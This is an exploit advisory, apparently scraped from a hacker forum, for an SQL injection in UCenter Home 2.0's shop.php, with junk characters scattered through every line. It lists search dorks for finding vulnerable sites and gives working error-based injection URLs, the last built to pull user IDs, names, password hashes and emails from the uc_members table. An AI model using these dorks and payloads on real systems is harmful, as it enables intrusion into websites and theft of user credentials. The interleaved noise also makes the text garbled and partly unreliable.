( S+ I: A! N/ X) y7 I4 {/ s__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ + d2 F' h% \+ l% J! V! V$ i4 e
$ j3 K4 ~! ?& v# H5 D( x" w " o+ \9 R3 J2 c: Q( x# x5 S5 Y0 s* F
( i9 r' z3 z3 F* ^*/ Author : KnocKout
4 ?. ]3 [. t" h- w8 ^
3 b' P- E. `2 v9 z0 e. _*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
! g" e3 c# ~3 b( V$ y
! c2 V# N/ A2 J7 Z& S*/ Contact: knockoutr@msn.com
4 s8 a4 A7 q! |; P) B8 g0 S7 L( K! Z3 o
*/ Cyber-Warrior.org/CWKnocKout
+ l/ M9 J- @4 r0 K4 f2 ~& g; E" E/ i) f( y. F9 Y7 X
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 8 U4 M8 u( \0 d, G2 I6 W
1 Q, `4 }3 P' h2 \0 {; F% KScript : UCenter Home
9 D+ M: ?7 ^+ `2 T0 Z( \( u. f6 F, Y+ |3 o, h, H8 S; |
Version : 2.0 ) q8 f5 D/ b$ ~5 M
3 `/ \5 _3 @2 Y& JScript HomePage : http://u.discuz.net/ + }. ^- U" u. t* _; M
i2 _. o7 M5 p( A5 L4 m/ h__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== % @, w+ c q- p" R* Z
9 [' U; f! V: K. ~) y
Dork : Powered by UCenter inurl:shop.php?ac=view
9 \; B* `3 [2 o+ B) R! L( a9 H- z$ C3 y( m l' ~) \
Dork 2 : inurl:shop.php?ac=view&shopid= ! }. q& i3 F- t: C& l' l( Q* b6 W
$ B0 s5 E0 G4 O4 ]
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( h8 \& ~) h+ ~9 _' i) z) Q5 W; y8 l" D) @
Vuln file : Shop.php : V$ Z: r0 S! }. [; C5 i- S
' a r9 K4 n2 O1 D) h: Q4 E- V
value's : (?)ac=view&shopid=
, V. u! U* L6 O+ o
! G- i9 |2 w2 l1 U+ _" EVulnerable Style : SQL Injection (MySQL Error Based) : Z8 t2 v& @2 F9 y/ N( m$ Y7 K
1 p( c8 l) f% j( m- ~/ z/ X' fNeed Metarials : Hex Conversion
0 y1 o( i* G; J6 z/ _: E% p% Z8 B! ?4 s9 T% \
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( s4 M5 m9 R' i l: t5 }
) y* w! I0 [! c! V" @2 I
Your Need victim Database name. $ V# \# [) w: y% G6 s
3 M5 |$ m# `) x7 Q" ofor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 5 E# v# U, B2 m2 Z
! h# v- b# E: O" _7 F: F6 h
.. 4 |; z2 ?# k# B9 Z
1 @0 C: h) z7 G* j ADB : Okey.
; o( q* q( ?0 x& V6 ~" x
6 e* u2 b1 I+ Z$ {0 ]* Pyour edit DB `[TARGET DB NAME]`
$ t5 i' o3 y/ R" @5 E+ |! Q; c& v: |; w7 l% x4 b) r! T7 c
Example : 'hiwir1_ucenter' % {) u$ Z' f& ^5 z( r
6 T- g) t% \# I5 W& E# ?2 _5 Y' { F
Edit : Okey.
9 B# e/ m0 n! d2 f- f/ `
5 J0 `$ O; k: T1 gYour use Hex conversion. And edit Your SQL Injection Exploit.. 8 k2 D5 j* I3 |4 Y) r8 w" ?) p
4 g* a/ e7 k, G9 a/ a ) l$ i5 I! b Q- g9 A0 m
' k S2 I' O' p. \Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ' j% R' [% ~; `
|